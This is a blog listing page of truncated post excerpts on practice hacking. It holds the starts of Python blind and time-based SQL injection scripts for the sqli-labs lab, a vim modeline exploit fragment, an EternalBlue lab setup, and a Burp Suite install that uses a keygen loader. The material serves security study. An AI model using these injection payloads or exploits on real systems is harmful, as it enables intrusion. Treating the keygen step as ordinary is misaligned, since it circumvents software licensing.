- 博客(9)
- 收藏
- 关注
原创 sqli-labs第九关延迟注入脚本
import requestsimport stringdef timeOut(url): #判断是否延时 try: res=requests.get(url,timeout=3) return "No" except Exception as e: return "TimeOut" def get_dbNa...
2020-04-01 18:21:34 683
原创 sqli-labs第八关布尔盲注脚本
import requestsdef get_dbNamelen(url): #猜解数据库名字长度 length=0 while True: dbNameLen_url=url+"?id=1' and length(database())="+str(length)+"--+" #print(dbNameLen_url) ...
2020-04-01 18:12:27 781
原创 Burp Suite的安装及配置
准备工作安装JAVA环境,并确保可用。(参考博客:https://blog.csdn.net/weixin_42750666/article/details/101361569)下载Brup Suite安装并打开打开下载好的Burp Suite文件夹–>选择burp-loader-keygen 若打开失败则选择文件夹中的cmd.bat选项 在弹出的界面中单击run...
2019-09-26 14:07:11 561
原创 安装配置JAVA环境
准备工作下载jdk,链接:http://www.oracle.com/technetwork/java/javase/archive-139210.html根据提示进行安装,自己选择路径(本文路径:F:\JAVA\jdk)配置环境变量此电脑(右击)–>属性–>更改设置–>高级–>环境变量新建系统变量JAVA_HOME,变量值为jdk的安装路径新...
2019-09-25 14:20:00 147
原创 ssh登陆失败——Host key verification failed的解决方案
问题描述在kali系统中用ssh连接其他主机时,出现如下错误,导致ssh连接失败问题成因Linux服务器系统重装、账户信息变更等致使其SSH 公钥变更,造成客户端保存公钥指纹与服务端不一致,导致 SSH 认证失败,拒绝登录。解决方法用vim编辑器打开/root/.ssh/known_hosts文件删除如下图黄框部分解决成功再次尝试ssh登陆,恢复正常登陆流程...
2019-09-15 15:00:03 984
原创 hack the box 注册邀请码的获取
在注册hack the box时,会被要求输入邀请码,但是该邀请码需要一系列的操作才能获得。具体步骤如下:获取验证码的网址https://www.hackthebox.eu/invite用F12打开开发者工具,在Console下执行 makeInviteCode(),发现ROT13的密文在https://rot13.com/网页上进行解密在kali中进行解密...
2019-09-10 23:50:53 4983 1
原创 vim编辑器漏洞复现
影响版本:Vim < 8.1.1365, Neovim < 0.3.6实验环境:实验主机:kali linux实验主机的vim编辑器版本:8.0.1766实验前提:实验主机开启modeline在/usr/share/vim/vimrc里写入set modeline实验过程:新建poc.txt文件:!uname -a||" vi:fen:fdm=e...
2019-08-20 22:48:58 254
原创 永恒之蓝漏洞复现
影响版本:Windows NT,Windows 2000、Windows XP、Windows 2003、WindowsVista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server2012 SP0。环境搭建:攻击机:kali IP:192.168.120.158靶机:windows server ...
2019-08-19 22:40:07 245
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人